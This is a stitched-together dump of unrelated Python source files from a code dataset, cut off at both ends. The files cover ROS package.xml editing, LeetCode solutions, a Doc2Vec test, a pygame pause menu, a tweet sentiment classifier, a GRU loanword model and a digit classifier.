(search_name is None or name == search_name) and (search_email is None or email == search_email):\n                el.childNodes[0].nodeValue = target_name\n                if target_email:\n                    el.setAttribute('email', target_email)\n                print('\\tReplacing %s %s/%s with %s/%s' % (el.nodeName, name, email, target_name, target_email))\n                self.changed = True\n\n    def get_license_element(self):\n        els = self.root.getElementsByTagName('license')\n        if len(els) == 0:\n            return None\n        return els[0]\n\n    def get_license(self):\n        el = self.get_license_element()\n        return el.childNodes[0].nodeValue\n\n    def set_license(self, license_str):\n        el = self.get_license_element()\n        if license_str != el.childNodes[0].nodeValue:\n            el.childNodes[0].nodeValue = license_str\n            self.changed = True\n\n    def is_metapackage(self):\n        for node in self.root.getElementsByTagName('export'):\n            for child in node.childNodes:\n                if child.nodeType == child.ELEMENT_NODE:\n                    if child.nodeName == 'metapackage':\n                        return True\n        return False\n\n    def get_plugin_xmls(self):\n        \"\"\"Return a mapping from the package name to a list of the relative path(s) for the plugin xml(s).\"\"\"\n        xmls = collections.defaultdict(list)\n        export = self.root.getElementsByTagName('export')\n        if len(export) == 0:\n            return xmls\n        for ex in export:\n            for n in ex.childNodes:\n                if n.nodeType == self.root.ELEMENT_NODE:\n                    plugin = n.getAttribute('plugin').replace('${prefix}/', '')\n                    xmls[n.nodeName].append(plugin)\n        return xmls\n\n    def get_export_tag(self):\n        \"\"\"Get the export tag. Create it if it doesn't exist.\"\"\"\n        export_tags = self.root.getElementsByTagName('export')\n        if len(export_tags) == 0:\n            export_tag = self.tree.createElement('export')\n            self.insert_new_tag(export_tag)\n            return export_tag\n        else:\n            return export_tags[0]\n\n    def add_plugin_export(self, pkg_name, xml_path):\n        \"\"\"Add the plugin configuration if not found. Add export tag as needed. Return the surrounding export tag.\"\"\"\n        ex_tag = self.get_export_tag()\n\n        attr = '${prefix}/' + xml_path\n        for tag in ex_tag.childNodes:\n            if tag.nodeName != pkg_name:\n                continue\n            plugin = tag.attributes.get('plugin')\n            if plugin and plugin.value == attr:\n                return\n\n        pe = self.tree.createElement(pkg_name)\n        pe.setAttribute('plugin', attr)\n        self.insert_new_tag_inside_another(ex_tag, pe)\n        return ex_tag\n\n    def upgrade(self, new_format=2, quiet=True):\n        if self.format == new_format:\n            if not quiet:\n                print('%s already in format %d!' 
% (self.name, self.format))\n return\n\n if new_format not in [2, 3]:\n raise RuntimeError('Unknown PackageXML version: ' + repr(new_format))\n\n if self.format == 1:\n if not quiet:\n print('Converting {} from version {} to 2'.format(self.name, self.format))\n self._format = 2\n self.root.setAttribute('format', '2')\n replace_package_set(self, ['build_depend', 'run_depend'], 'depend')\n replace_package_set(self, ['run_depend'], 'exec_depend')\n\n if new_format == 3:\n if not quiet:\n print('Converting {} from version {} to 3'.format(self.name, self.format))\n self._format = 3\n self.root.setAttribute('format', '3')\n self.header = FORMAT_3_HEADER\n\n self.changed = True\n\n def write(self, new_fn=None):\n if new_fn is None:\n new_fn = self.fn\n\n if new_fn == self.fn and not self.changed:\n return\n\n s = self.tree.toxml(self.tree.encoding)\n index = get_package_tag_index(s)\n s = self.header + s[index:] + '\\n'\n\n with open(new_fn, 'wb') as f:\n f.write(s.encode('UTF-8'))\n","repo_name":"DLu/roscompile","sub_path":"ros_introspection/src/ros_introspection/package_xml.py","file_name":"package_xml.py","file_ext":"py","file_size_in_byte":17572,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"69"}
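+A sketch of the typical round trip with the class above, assuming the constructor takes the path to a package.xml (the exact signature is an assumption):
+
+manifest = PackageXML('package.xml')
+manifest.upgrade(new_format=2, quiet=False)  # rewrites format-1 depend tags
+manifest.write()                             # only touches the file if something changed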
+{"seq_id":"33370713394","text":"def distributeCandies(self, candies, num_people):\n \"\"\"\n :type candies: int\n :type num_people: int\n :rtype: List[int]\n \"\"\"\n res = [0] * num_people\n give = 1\n i = 0\n\n while candies > 0:\n if give <= candies:\n res[i] += give\n else:\n give = candies\n res[i] += candies\n candies -= give\n give += 1\n i += 1\n i = i % num_people\n return res","repo_name":"CoderQingli/MyLeetCode","sub_path":"1103. Distribute Candies to People.py","file_name":"1103. Distribute Candies to People.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"11486299096","text":"import sys\nsys.setrecursionlimit(10**6)\n\ndef solution(n, paths, gates, summits):\n visited = [False] * (n+1)\n for gate in gates:\n visited[gate] = True\n for summit in summits:\n visited[summit] = \"summit\"\n \n graph = [[] for _ in range(n+1)]\n for path in paths:\n node1, node2, cost = path\n graph[node1].append([node2, cost])\n graph[node2].append([node1, cost])\n\n for i in range(len(graph)):\n graph[i].sort(key=lambda x: x[1])\n\n def dfs(n, max_intensity):\n global result, direction\n if max_intensity < result[1] and visited[n] == \"summit\":\n result = [n, max_intensity]\n return\n elif max_intensity == result[1] and n < result[0] and visited[n] == \"summit\":\n result = [n, max_intensity]\n return\n\n for node, cost in graph[n]:\n if cost > result[1] or (n, node) in direction:\n continue\n\n if not visited[node]:\n direction.add((n, node))\n visited[node] = True\n dfs(node, max(max_intensity, cost))\n visited[node] = False\n\n if visited[node] == \"summit\":\n dfs(node, max(max_intensity, cost))\n \n global result, direction\n result = [float('inf'), float('inf')] # 산봉우리의 번호, intensity의 최솟값\n direction = set()\n for gate in gates:\n dfs(gate, 0)\n\n return result\n\nprint(solution(7, [[1, 2, 5], [1, 4, 1], [2, 3, 1], [2, 6, 7], [4, 5, 1], [5, 6, 1], [6, 7, 1]], [3, 7], [1, 5]))\n\n\n\n # queue = deque()\n # queue.append((n, cummu_cost))\n # visited = [[False] * (n+1)]\n # visited[n] = True\n # while queue:\n # n, cummu_cost = queue.popleft()\n # for node, cost in graph[n]:\n # if node in gates:\n # continue\n\n \n # if not visited[node]:\n # visited[node] = True\n # queue.append((node, cummu_cost + cost))","repo_name":"ParkHoH/algorithm_test","sub_path":"programmers/coding test.py/카카오 인턴/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":2038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42944116739","text":"class Solution:\n def canPartitionKSubsets(self, nums: List[int], k: int) -> bool:\n if not sum(nums)%k==0:\n return False\n\n def subsetSum(nums, summ, n):\n dp = [[False] * (summ + 1) for i in range(n + 1)]\n\n for i in range(n + 1):\n for j in range(summ + 1):\n if i == 0:\n dp[i][j] = False\n if j == 0:\n dp[i][j] = True\n\n for i in range(1, n + 1):\n for j in range(1, summ + 1):\n if nums[i - 1] <= j:\n dp[i][j] = dp[i - 1][j - nums[i - 1]] or dp[i - 1][j]\n\n elif nums[i - 1] > j:\n dp[i][j] = dp[i - 1][j]\n return dp[-1][-1]\n return subsetSum(nums,sum(nums)//k,len(nums))\n","repo_name":"iamshivamgoswami/dynamic-programming-important","sub_path":"subset sum.py","file_name":"subset sum.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7499541615","text":"from gensim.models.doc2vec import Doc2Vec\nfrom nltk.tokenize import word_tokenize\nimport numpy as np\n\nmodel= Doc2Vec.load(\"d2v.model\")\n#to find the vector of a document which is not in training data\n# test_data = word_tokenize(\"I love chatbots\".lower())\n# v1 = model.infer_vector(test_data)\n# print(\"V1_infer\", v1)\n\n# print(model.docvecs.most_similar(0))\n#\n# #to find most similar doc using tags\n# similar_doc = model.docvecs.most_similar('1')\n# print(similar_doc)\n\n\n# to find vector of doc in training data using tags or in other words, printing the vector of document at index 1 in training data\n#print(model.docvecs['0'])\n\nvectors=np.zeros((model.corpus_count,model.vector_size),np.float)\nprint(vectors.shape)\nfor i in range(model.corpus_count):\n vectors[i]=model.docvecs[i]\n\nprint(vectors.shape)\n\nprint(vectors[0])\n","repo_name":"siddhartha047/GSSLEmbedding","sub_path":"Vectorize/Doc2Vec/Test/Doc2VecTest.py","file_name":"Doc2VecTest.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"24027813401","text":"import pygame,sys\nfrom pygame.locals import *\nfrom constantes import *\nfrom gui_form import Form\nfrom gui_button import Button\nfrom gui_widget import Widget\n\nclass FormPause(Form):\n def __init__(self,name,master_surface,x,y,w,h,color_background,imagen_background,color_border,active):\n super().__init__(name,master_surface,x,y,w,h,color_background,imagen_background,color_border,active)\n self.text1 = Widget(master_form=self,x=35,y=25,w=240,h=70,color_background=None,color_border=None,image_background= None,text=\"PAUSED\",font=\"8 BIT WONDER NOMINAL\",font_size=38,font_color=C_WHITE)\n self.boton1 = Button(master=self,x=50,y=115,w=210,h=23,color_background=None,color_border=None,image_background= None,on_click=self.on_click_boton1,on_click_param=\"level_1\",text=\"RESUME\",font=\"8 BIT WONDER NOMINAL\",font_size=23,font_color=C_WHITE)\n self.boton2 = Button(master=self,x=50,y=150,w=210,h=23,color_background=None,color_border=None,image_background= None,on_click=self.on_click_boton1,on_click_param=\"pause_settings\",text=\"SETTINGS\",font=\"8 BIT WONDER NOMINAL\",font_size=23,font_color=C_WHITE)\n self.boton3 = Button(master=self,x=50,y=185,w=210,h=23,color_background=None,color_border=None,image_background= None,on_click=self.on_click_boton1,on_click_param=\"main_menu\",text=\"MAIN MENU\",font=\"8 BIT WONDER NOMINAL\",font_size=23,font_color=C_WHITE)\n self.boton4 = Button(master=self,x=50,y=220,w=210,h=23,color_background=None,color_border=None,image_background= None,on_click=self.exit_game,on_click_param=\"None\",text=\"EXIT GAME\",font=\"8 BIT WONDER NOMINAL\",font_size=23,font_color=C_WHITE)\n \n self.lista_widget = [self.boton1,self.boton2,self.boton3,self.boton4,self.text1]\n\n def on_click_boton1(self, parametro):\n \n self.set_active(parametro)\n \n def on_click_reset(self,parametro):\n self.forms_dict[self.boton1.on_click_param].resetear()\n self.set_active(parametro)\n \n\n def cambiar_nivel(self,parametro):\n self.boton1.on_click_param = parametro\n\n def exit_game(self,none):\n sys.exit()\n\n def update(self, lista_eventos,keys,sonidos,delta_ms,timer_1s):\n for aux_widget in self.lista_widget:\n aux_widget.update(lista_eventos,keys,delta_ms)\n for evento in lista_eventos:\n if evento.type == pygame.KEYDOWN:\n if evento.key == pygame.K_ESCAPE:\n self.set_active(self.boton1.on_click_param)\n\n def draw(self): \n super().draw()\n for aux_widget in self.lista_widget: \n aux_widget.draw()","repo_name":"MarceloTorres19/Marcelo_Torres_juego_pygame","sub_path":"gui_form_pause.py","file_name":"gui_form_pause.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"35602695226","text":"from typing import List\n\n\nclass Solution:\n def threeSum(self, nums: List[int]) -> List[List[int]]:\n ret = []\n nums.sort()\n for left in range(len(nums) - 1):\n mid = left + 1\n right = len(nums) - 1\n if left > 0 and nums[left] == nums[left - 1]:\n continue\n while mid < right:\n total = nums[left] + nums[mid] + nums[right]\n if total == 0:\n ret.append([nums[left], nums[mid], nums[right]])\n while mid < right and nums[mid] == nums[mid + 1]:\n mid += 1\n while mid < right and nums[right] == nums[right - 1]:\n right -= 1\n\n mid += 1\n right -= 1\n elif total > 0:\n right -= 1\n else:\n mid += 1\n\n return ret\n","repo_name":"pktangyue/LeetCode","sub_path":"python/15_3Sum.py","file_name":"15_3Sum.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29777712611","text":"import numpy as np\n\n\ndef test_frame_exists(hardware_VidCapture):\n frame = hardware_VidCapture\n h, w = frame.shape[:2]\n\n assert w > 0\n assert w > h\n\n\ndef test_frame_size(hardware_VidCapture):\n \"\"\"Check it is of the expected dimensions.\n This is due to the amount of hardcoded values currently used in the package\"\"\"\n frame = hardware_VidCapture\n h, w = frame.shape[:2]\n assert h == 480\n assert w == 640\n\n\ndef test_numpy_mask(hardware_VidCapture):\n \"\"\"Check that a numpy mask works as expected\"\"\"\n frame = hardware_VidCapture\n h, w = frame.shape[:2]\n\n mask = np.zeros_like(frame)\n expectedH, expectedW = mask.shape[:2]\n\n assert expectedH == h\n assert expectedW == w\n\n\ndef test_streamlink_exists(streamlink_VidCapture):\n frame = streamlink_VidCapture\n h, w = frame.shape[:2]\n\n assert w > 0\n assert w > h\n","repo_name":"boo13/xcv","sub_path":"tests/test_video_frame.py","file_name":"test_video_frame.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"19383133034","text":"\"\"\"\n* Transformation explained.\n*\n* @author rambabu.posa\n\"\"\"\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import (lit,col,concat,expr)\nimport os\n\ncurrent_dir = os.path.dirname(__file__)\nrelative_path = \"../../../../data/NCHS_-_Teen_Birth_Rates_for_Age_Group_15-19_in_the_United_States_by_County.csv\"\nabsolute_file_path = os.path.join(current_dir, relative_path)\n\n# Step 1 - Creates a session on a local master\nspark = SparkSession.builder.appName(\"Analysing Catalyst's behavior\") \\\n .master(\"local[*]\").getOrCreate()\n\n# Step 2 - Reads a CSV file with header, stores it in a dataframe\ndf = spark.read.csv(header=True, inferSchema=True,path=absolute_file_path)\n\ndf0 = df\n\n# Step 3 - Build a bigger dataset\ndf = df.union(df0)\n\n# Step 4 - Cleanup. preparation\ndf = df.withColumnRenamed(\"Lower Confidence Limit\", \"lcl\") \\\n .withColumnRenamed(\"Upper Confidence Limit\", \"ucl\")\n\n# Step 5 - Transformation\ndf = df.withColumn(\"avg\", expr(\"(lcl+ucl)/2\")) \\\n .withColumn(\"lcl2\", col(\"lcl\")) \\\n .withColumn(\"ucl2\", col(\"ucl\"))\n\n# Step 6 - explain\ndf.explain()\n\nspark.stop()\n\n","repo_name":"jgperrin/net.jgp.books.spark.ch04","sub_path":"src/main/python/lab500_transformation_explain/transformationExplainApp.py","file_name":"transformationExplainApp.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"69"}
+{"seq_id":"10756260055","text":"# https://leetcode.com/problems/longest-palindromic-substring/?envType=list&envId=xi4ci4ig\n\nfrom utils import test\n\n\nclass Solution:\n def longestPalindrome(self, s: str) -> str:\n '''\n 使用 for 遍历字串每个字\n 对每个字,往左往右检查是否为回文字,取出回文字\n 比较出最大回文字\n '''\n # 于字串间填补 '#', 解决奇、偶回文字问题\n s = '#'.join(c for c in s)\n\n # 如果只有单一字串,回传单字\n longest_str = s[0]\n\n # 遍历字串每个字\n for i in range(len(s)):\n # 找出回文字半径 (左右扩展, 回传半径)\n r = self.get_palindrome_radius(s, i)\n if r > 0:\n # 取出半径内的字串,并移除填补的 '#'\n p_str = s[i-r:i+r+1].replace('#', '')\n # 比较是否为最大回文字\n if len(p_str) > len(longest_str):\n longest_str = p_str\n\n return longest_str\n\n def get_palindrome_radius(self, s, i):\n r_idx = i + 1\n l_idx = i - 1\n\n # 左右指标超出范围,回传 0\n if l_idx < 0 or r_idx > len(s) - 1:\n return 0\n\n # 左右扩展直到边界,当左右字不一样,回传回文字半径 (k 用来纪录半径)\n k = 0\n while l_idx >= 0 and r_idx < len(s):\n if s[l_idx] != s[r_idx]:\n return k\n\n k += 1\n l_idx -= 1\n r_idx += 1\n\n # 当左右扩展到边界后,回传回文字半径\n return k\n\n\nif __name__ == '__main__':\n inps = [\n \"ac\",\n \"a\",\n \"babad\",\n \"cbbd\"\n ]\n exps = [\n 'a',\n 'a',\n 'bab',\n 'bb'\n ]\n\n s = Solution()\n\n outs = []\n for inp in inps:\n outs.append(s.longestPalindrome(inp))\n\n test(outs, exps)\n\n print('out:', outs)\n print('exp:', exps)","repo_name":"conflick0/DSA","sub_path":"leetcode/5_Longest_Palindromic_Substring.py","file_name":"5_Longest_Palindromic_Substring.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"19522450882","text":"import pandas as pd\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\n\nfrom src.data.wold import WOLD\n\n\nclass NN:\n\n def __init__(\n self,\n train_set,\n test_set,\n n_hidden: int = 32,\n ):\n self.df = WOLD().df\n self.train_set = train_set.reset_index(drop=True)\n self.test_set = test_set.reset_index(drop=True)\n\n self.all_letters = []\n\n for l in self.df.segments:\n for s in l:\n if s not in self.all_letters:\n self.all_letters.append(s)\n\n self.best_model = GRU(\n len(self.all_letters),\n n_hidden,\n 2, # this is a binary classification language task\n )\n\n self.best_model.load_state_dict(\n torch.load('src/models/gru/best_model_state.pt')\n )\n\n def predict(self, X):\n X = X.reset_index(drop=True)\n pred = []\n\n for i in range(len(X)):\n _, _, _, line_tensor = self.testing_sample(X, i)\n output = self.evaluate(line_tensor)\n guess = self.category_from_output(output)\n pred.append(guess)\n return pred\n\n def predict_word(self, word):\n line_tensor = self.char_tensor(word)\n output = self.evaluate(line_tensor)\n return self.category_from_output(output)\n\n def evaluate(self, line_tensor):\n hidden = self.best_model.initHidden()\n\n for i in range(line_tensor.size()[0]):\n output, hidden = self.best_model(line_tensor[i], hidden)\n\n return output\n\n def category_from_output(self, output):\n top_n, top_i = output.topk(1)\n category_i = top_i[0].item()\n return category_i\n\n def char_tensor(self, list_of_strings):\n tensor = torch.zeros(len(list_of_strings)).long()\n for c in range(len(list_of_strings)):\n tensor[c] = self.all_letters.index(list_of_strings[c])\n return Variable(tensor)\n\n def testing_sample(self, data, i):\n self.all_categories = [0, 1]\n category = int(data.borrowing_score[i])\n line = data.segments[i]\n category_tensor = torch.tensor([self.all_categories.index(category)], dtype=torch.long)\n line_tensor = self.char_tensor(line)\n\n return category, line, category_tensor, line_tensor\n\nclass GRU(nn.Module):\n def __init__(self, n_characters_in, hidden_size, n_characters_out, n_layers=1, batch_size=1):\n super(GRU, self).__init__()\n self.n_characters_in = n_characters_in\n self.n_characters_out = n_characters_out\n self.hidden_size = hidden_size\n self.n_layers = n_layers\n self.batch_size = batch_size\n\n self.encoder = nn.Embedding(num_embeddings=self.n_characters_in,\n embedding_dim=self.hidden_size)\n self.gru = nn.GRU(input_size=self.hidden_size,\n hidden_size=self.hidden_size,\n num_layers=self.n_layers,\n dropout=0.2)\n self.decoder = nn.Linear(self.hidden_size, n_characters_out)\n\n def forward(self, input_char, hidden):\n encoded = self.encoder(input_char)\n encoded.unsqueeze_(0)\n encoded.unsqueeze_(0)\n output, hidden = self.gru(encoded, hidden)\n output = self.decoder(output.view(1, -1))\n return output, hidden\n\n def initHidden(self):\n return Variable(torch.zeros(self.n_layers, self.batch_size, self.hidden_size))\n","repo_name":"hafer-cappuccino/bahasa-loanword-detection","sub_path":"src/models/gru/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"41151922996","text":"from __future__ import annotations\nfrom typing import Any\n\nclass ForumPostModel:\n \"\"\"\n A model that contains info about a forum post.\n\n ...\n\n Attributes\n ----------\n thread_id : int\n unique id for the thread\n page_num : int\n page number in the thread of the post\n post_num : int\n post number on the page\n username : str\n the username of the poster\n post_body : str\n the body message of the post\n timestamp : str\n the cleaned timestamp\n edit_timestamp : str\n cleaned edit timestamp, can be None\n scraped_timestamp : str\n the raw timestamp as it was posted\n \"\"\"\n\n def __init__(\n self,\n thread_id: int,\n page_num: int,\n post_num: int,\n username: str,\n post_body: str,\n timestamp: str,\n edit_timestamp: str,\n scraped_timestamp: str\n ):\n self.thread_id = thread_id\n self.page_num = page_num\n self.post_num = post_num\n self.username = username\n self.post_body = post_body\n self.timestamp = timestamp\n self.edit_timestamp = edit_timestamp\n self.scraped_timestamp = scraped_timestamp\n \n @classmethod\n def from_array(cls, data: Any) -> ForumPostModel:\n obj = cls(data[0], data[1], data[2], data[3], data[4], data[5], data[6], data[7])\n return obj\n \n #NOTE: this works, but i dont know if it is good practice\n # def __init__(self, *args, **kwargs):\n # if len(args) == 8:\n # self.from_array(list(args))\n # elif len(args) == 1:\n # self.from_array(args[0])\n\n def identifier(self):\n \"\"\"\n returns the identifying numbers for the post\n \"\"\"\n return (self.thread_id, self.page_num, self.post_num)\n\n def __str__(self):\n line = \"\\n------------------------------------------------------------------\\n\"\n meta = \"Post #{}.{}.{} - {}\\n\".format(self.thread_id, self.page_num, self.post_num, self.scraped_timestamp)\n post = \"{}\\n\\t{}\\nPosted: {}, Edited: {}\".format(self.username, self.post_body, self.timestamp, self.edit_timestamp)\n return line + meta + post + line \n","repo_name":"binzabinza/rs-disc","sub_path":"Models/forum_post_model.py","file_name":"forum_post_model.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"451978213","text":"# This project can be found at\n# https://www.kaggle.com/leandrodoze/sentiment-analysis-in-portuguese/notebook\n\n# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n\n# Análise de sentimento de Tweets de Minas Gerais\n\n# --- Importando as bibliotecas --- #\nimport pandas as pd\nfrom sklearn import metrics\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.feature_extraction.text import CountVectorizer\n\n# --- Carregamento de dados --- #\nurl='https://drive.google.com/file/d/1Ds6zhEE7HJgLPP22ZVDVmkWjODr_jxFc/view?usp=sharing'\nfile_id=url.split('/')[-2]\ndwn_url='https://drive.google.com/uc?id=' + file_id\n\n# Download dos dados do kaggle\ndataset = pd.read_csv(dwn_url)\n\n# --- Verificando os dados --- #\n\"\"\"\n# Mostrar linhas inicias da tabela\nprint(dataset.head())\nprint()\n# Quantidade de dados\nprint(dataset.count())\nprint()\n# Os classificados como neutro\nprint(dataset[dataset.Classificacao == 'Neutro'].count())\nprint()\n# Os classificados como positivo\nprint(dataset[dataset.Classificacao == 'Positivo'].count())\nprint()\n# E os classificados como negativo\nprint(dataset[dataset.Classificacao == 'Negativo'].count())\nprint()\n\"\"\"\n# --- Separando os dados --- #\n\n# Próximo passo, vamos separar os tweets e suas classes\ntweets = dataset[\"Text\"].values\nprint(tweets)\nprint()\nclasses = dataset[\"Classificacao\"].values\nprint(classes)\nprint()\n\n# Vamos usar algumas frases de teste para fazer a classificação com o modelo treinado\ntestes = [\"Esse governo está no início, vamos ver o que vai dar\",\n \"Estou muito feliz com o governo de São Paulo esse ano\",\n \"O estado de Minas Gerais decretou calamidade financeira!!!\",\n \"A segurança desse país está deixando a desejar\",\n \"O governador de Minas é do PT\",\n \"O prefeito de São Paulo está fazendo um ótimo trabalho\"]\n\n# --- Preparação do modelo --- #\n\n# Random Forest\nfrom sklearn.ensemble import RandomForestClassifier\nforest = RandomForestClassifier(n_estimators=100)\n\n# --- Treinamento do modelo --- #\n\n# Inicializar o bag of words com um parâmetro máximo de features\nvectorizer = CountVectorizer(analyzer = \"word\", tokenizer = None, preprocessor = None,\n stop_words = None, max_features = 5000)\n# Treinar o modelo, aprender o vocabulário e transformar nossos dados de treinamento em feature vectors\ntrain_data_features = vectorizer.fit_transform(tweets)\n# Ajusta a forest ao dataset de treinamento usando a bag of words como feature e os sentimentos\n# como a resposta variável\nforest = forest.fit(train_data_features, classes)\n\n# --- Avaliação do modelo --- #\n\nresultados = cross_val_predict(forest, train_data_features, classes, cv = 10)\n# Medidas de validação do modelo\nsentimentos = ['Neutro', 'Positivo', 'Negativo']\nprint(metrics.classification_report(classes, resultados, target_names = sentimentos))\n\n# --- Classificação de tweets --- #\n\n# Criar a BOW de teste\ntest_data_features = vectorizer.transform(testes)\n# Fazendo a predição\nresultados = forest.predict(test_data_features)\n# Disposição de dados em tabela\ntestes_id = [1, 2, 3, 4, 5, 6]\n\ndata_frame = pd.DataFrame(data = { \"id\": testes_id, \"texto\": testes, \"sentimento\": resultados })\nprint(data_frame)\n\n# Está bem ruim, vamos melhorar o 
modelo\n","repo_name":"iagoscm/katie-ciencia-de-dados","sub_path":"analiseSentimentosTwitter.py","file_name":"analiseSentimentosTwitter.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"37080315061","text":"from data_processing import SeriesDataset\nimport torch\nimport pandas as pd\nfrom torch.utils.data import DataLoader\nfrom model import LSTMModel\n\nfactory_kwargs = {'device': 1, 'dtype': 2}\nprint({**factory_kwargs})\n\na= [1,2,3]\ndel a[0]\nprint(len(a))\n\ninput_path = \"data/building-data-genome-project-2/data/processing/weather/Hog.csv\"\ntarget_path = \"data/building-data-genome-project-2/data/processing/electricity/Hog.csv\"\ntarget_index = ['Hog_education_Jordan']\ninput_index = ['timestamp', 'airTemperature', 'dewTemperature', 'windSpeed']\ntime_set = SeriesDataset(input_path, target_path, timeenc=0, input_index=input_index, target_index=target_index)\ntime_loader = DataLoader(time_set, batch_size=1, shuffle=False)\nmodel = LSTMModel(input_size=3, hidden_size=64, num_layers=2, output_size=1)","repo_name":"Mborn2run/CustomModel","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"41179952982","text":"import sys\nfrom eval import evaluator\n\ndef create_pop(ind,v):\n pop = []\n for i in range(evaluator.D):\n if ind[i] == v:\n continue\n tmp = [x for x in ind]\n tmp[i] = v\n pop.append(tmp)\n return pop\n\n# 目的関数値のみを考慮した解選択\ndef get_indexA(f1_list,m_list,best,pay):\n index = -1\n for i, f1 in enumerate(f1_list):\n if best > f1:\n index = i\n best = f1\n return index\n\n# 目的関数値と支給金額を考慮した解選択\ndef get_indexB(f1_list,m_list,best,pay):\n index, value = -1, 0 \n for i, (f1, m) in enumerate(zip(f1_list, m_list)):\n if pay == m:\n v = (best - f1) / 0.001\n else:\n v = (best - f1) / abs(pay - m)\n if value < v:\n index = i\n value = v\n return index\n\ndef main():\n args = sys.argv\n evaluator.init(args[1], args[2])\n if args[3] == \"A\":\n get_index = get_indexA\n else:\n get_index = get_indexB\n b = int(args[4])\n\n change_count, fe = 0, 2\n ind = [b] * evaluator.D\n b = abs(b-1)\n f1_list, _, m_list = evaluator.evaluation([ind])\n best = f1_list[0]\n pay = m_list[0]\n print(-1, best, pay, *ind, sep=\",\")\n print(fe, best, pay, -1, -1, sep=\",\", file=sys.stderr)\n\n for num in range(40):\n if change_count == 2:\n break\n pop = create_pop(ind,b)\n f1_list, _, m_list = evaluator.evaluation(pop)\n for p, f1, m in zip(pop, f1_list, m_list):\n print(num, f1, m, *p, sep=\",\")\n fe += 2*len(pop)\n \n index = get_index(f1_list,m_list,best,pay)\n\n if index == -1:\n print(fe, best, -1, -1, -1, sep=\",\", file=sys.stderr)\n b = abs(b-1)\n change_count += 1\n continue\n \n for i in range(evaluator.D):\n if ind[i] != pop[index][i]:\n break\n print(fe, f1_list[index], m_list[index], i, index, sep=\",\", file=sys.stderr)\n change_count = 0\n ind = [x for x in pop[index]]\n best = f1_list[index]\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tomtkg/EC-Comp2021","sub_path":"propose.py","file_name":"propose.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"5606386915","text":"import numpy as np\nimport math\n\n\ndef mode0(br, codRes, fps):\n # model parameters\n a1 = 11.99835\n a2 = -2.99992\n a3 = 41.24751\n a4 = 0.13183\n\n # core model\n bpp = br / (codRes * fps)\n quant = a1 + a2 * np.log(a3 + np.log(br) + np.log(br * bpp + a4))\n return quant","repo_name":"songhaocuc/abr-evaluation","sub_path":"evaluator/pnats/p1203/mode0.py","file_name":"mode0.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"26253312536","text":"import glob\nimport os\nfrom io import BytesIO\nfrom typing import Iterable, List, Tuple\n\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.models import Sequential\n\nmodel = Sequential(\n [\n tf.keras.Input(shape=(40000,)),\n Dense(128, activation=\"sigmoid\"),\n Dense(64, activation=\"sigmoid\"),\n Dense(32, activation=\"sigmoid\"),\n Dense(10, activation=\"linear\"),\n ],\n name=\"numbers_classification_model1\",\n)\n\n\nmodel.compile(\n loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),\n optimizer=tf.keras.optimizers.Adam(learning_rate=0.001),\n)\n\n\ndef get_label_from_filename(filename: str) -> int:\n return int(os.path.split(filename)[-1][0])\n\n\ndef get_bw_value(pixel: Tuple[int]) -> int:\n if all([x == 255 for x in pixel]):\n return 1\n return 0\n\n\ndef transform_to_black_and_white_array(image_data: Iterable) -> List[int]:\n return [get_bw_value(pixel) for pixel in image_data]\n\n\ndef load_training_data() -> Tuple[list, list]:\n X_train = []\n y_train = []\n test_filename = \"\"\n for filename in sorted(glob.glob(os.path.join(\"src/training_data/\", \"*.png\"))):\n with Image.open(filename) as image:\n test_filename == filename\n image_data = image.getdata()\n X_train.append(transform_to_black_and_white_array(image_data))\n y_train.append(get_label_from_filename(filename))\n\n return X_train, y_train\n\n\ndef train_model(X_train: list, y_train: list) -> None:\n model.fit(X_train, y_train, epochs=300)\n model.summary()\n\n\ndef predict_label(x: list, internal_model: Sequential = model) -> np.signedinteger:\n prediction_array = 